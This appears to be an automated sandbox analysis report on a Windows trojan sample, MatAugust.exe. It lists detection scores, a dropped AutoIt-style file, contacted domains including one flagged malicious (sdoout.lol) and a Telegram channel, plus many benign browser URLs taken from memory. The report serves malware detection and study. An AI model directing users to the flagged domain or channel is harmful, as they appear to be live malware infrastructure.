Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MatAugust.exe	32%	Virustotal		Browse
MatAugust.exe	24%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://anglebug.com/3498C	0%	Avira URL Cloud	safe
http://anglebug.com/67556	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sdoout.lol	116.203.14.4	true	true	unknown
plus.l.google.com	172.217.18.14	true	false	high
play.google.com	142.250.181.238	true	false	high
t.me	149.154.167.99	true	false	high
www.google.com	172.217.16.196	true	false	high
GeVuzPdhfiKPHBwrLx.GeVuzPdhfiKPHBwrLx	unknown	unknown	false	unknown
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/w211et	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	chrome.exe, 00000011.00000002.2065657638.0000250C00BB4000.00000004.00000800.00020000.00000000.sdmp, 8900hv.12.dr	false		high
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000011.00000002.2061215696.0000250C000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	chrome.exe, 00000011.00000002.2064055961.0000250C00789000.00000004.00000800.00020000.00000000.sdmp, 8900hv.12.dr	false		high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing	chrome.exe, 00000011.00000002.2060775857.0000250C00098000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000011.00000002.2064025241.0000250C0075C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/J	chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 00000011.00000002.2066836064.0000250C00E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064139206.0000250C007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	cjw47q.12.dr	false		high
https://google-ohttp-relay-join.fastly-edge.com/ji	chrome.exe, 00000011.00000003.2016527035.0000250C0151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2017059554.0000250C01524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2016559267.0000250C01520000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/284462263	chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly	chrome.exe, 00000011.00000002.2064109486.0000250C007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067204677.0000250C01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064055961.0000250C00789000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063086757.0000250C004AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000011.00000003.1987903426.0000250C00FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989759004.0000250C01140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989545377.0000250C010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987712081.0000250C00EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989002622.0000250C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989353177.0000250C00398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989171545.0000250C00F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062257227.0000250C002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988291160.0000250C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987978177.0000250C00EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989030007.0000250C00854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987933158.0000250C01040000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/	chrome.exe, 00000011.00000003.1975751157.0000250C00474000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/:	chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.ico%	chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com/settings?referrer=CHROME_NTP	chrome.exe, 00000011.00000002.2064645333.0000250C00983000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064998835.0000250C00A44000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7714	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
http://unisolated.invalid/	chrome.exe, 00000011.00000002.2064782043.0000250C009B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000011.00000003.1989759004.0000250C01140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989545377.0000250C010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989353177.0000250C00398000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/tips/	chrome.exe, 00000011.00000002.2064615660.0000250C00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064139206.0000250C007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/8k	chrome.exe, 00000011.00000003.2016527035.0000250C0151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2017059554.0000250C01524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2016559267.0000250C01520000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	cjw47q.12.dr	false		high
http://anglebug.com/67556	chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google-ohttp-relay-join.fastly-edge.com/ll	chrome.exe, 00000011.00000003.2016527035.0000250C0151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2017059554.0000250C01524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2016559267.0000250C01520000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/255411748	chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 00000011.00000002.2064109486.0000250C007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067204677.0000250C01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064055961.0000250C00789000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063086757.0000250C004AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/tools/feedback/chrome/__submit%	chrome.exe, 00000011.00000002.2063086757.0000250C004AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?q=	chrome.exe, 00000011.00000002.2064452944.0000250C008BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065657638.0000250C00BB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000011.00000003.1985213876.0000250C00C80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000011.00000003.1975751157.0000250C00474000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000011.00000003.1987903426.0000250C00FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989759004.0000250C01140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989545377.0000250C010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987712081.0000250C00EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989002622.0000250C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989353177.0000250C00398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989171545.0000250C00F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062257227.0000250C002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988291160.0000250C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987978177.0000250C00EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989030007.0000250C00854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987933158.0000250C01040000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.ico	chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	8900hv.12.dr	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	cjw47q.12.dr	false		high
http://www.autoitscript.com/autoit3/X	Stopped.com, 0000000C.00000000.1705629202.00000000007F5000.00000002.00000001.01000000.00000007.sdmp, Stopped.com.1.dr, Born.8.dr	false		high
https://chrome.google.com/webstore?hl=en.	chrome.exe, 00000011.00000002.2067619227.0000250C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067403406.0000250C010CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b%	chrome.exe, 00000011.00000002.2064782043.0000250C009B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, 8900hv.12.dr	false		high
https://drive-daily-1.corp.google.com/	chrome.exe, 00000011.00000003.1975751157.0000250C00474000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000011.00000003.1975751157.0000250C00474000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.ico	chrome.exe, 00000011.00000002.2065657638.0000250C00BB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000011.00000002.2064025241.0000250C0075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067153879.0000250C00FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063143368.0000250C004DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://plus.google.com	chromecache_86.19.dr	false		high
http://anglebug.com/3498C	chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3078	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000011.00000003.1974990599.0000250C001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000011.00000002.2064025241.0000250C0075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067153879.0000250C00FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063143368.0000250C004DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 00000011.00000002.2060458999.0000250C00024000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-preprod.corp.google.com/	chrome.exe, 00000011.00000003.1975751157.0000250C00474000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	jw4wb1.12.dr	false		high
https://sandbox.google.com/	chrome.exe, 00000011.00000003.1975843997.0000250C002A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients4.google.com/chrome-sync	chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://unisolated.invalid/a	chrome.exe, 00000011.00000002.2064782043.0000250C009B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/$k	chrome.exe, 00000011.00000003.2016527035.0000250C0151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2017059554.0000250C01524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2016559267.0000250C01520000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/J	chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5007	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 00000011.00000002.2062574243.0000250C00360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3862	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000011.00000003.1985172745.0000250C00C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989116490.0000250C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1991109558.0000250C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989082250.0000250C00C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1984554431.0000250C00C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1984640964.0000250C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1985389637.0000250C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1985213876.0000250C00C80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/search?q=&addon=opensearch	chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/5k	chrome.exe, 00000011.00000003.2016527035.0000250C0151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2017059554.0000250C01524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2016559267.0000250C01520000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 00000011.00000002.2065657638.0000250C00BB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29	chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/$n	chrome.exe, 00000011.00000003.2016527035.0000250C0151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2017059554.0000250C01524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2016559267.0000250C01520000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/:	chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4384	chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/el	chrome.exe, 00000011.00000003.2016527035.0000250C0151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2017059554.0000250C01524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2016559267.0000250C01520000.00000004.00000800.00020000.00000000.sdmp	false		high
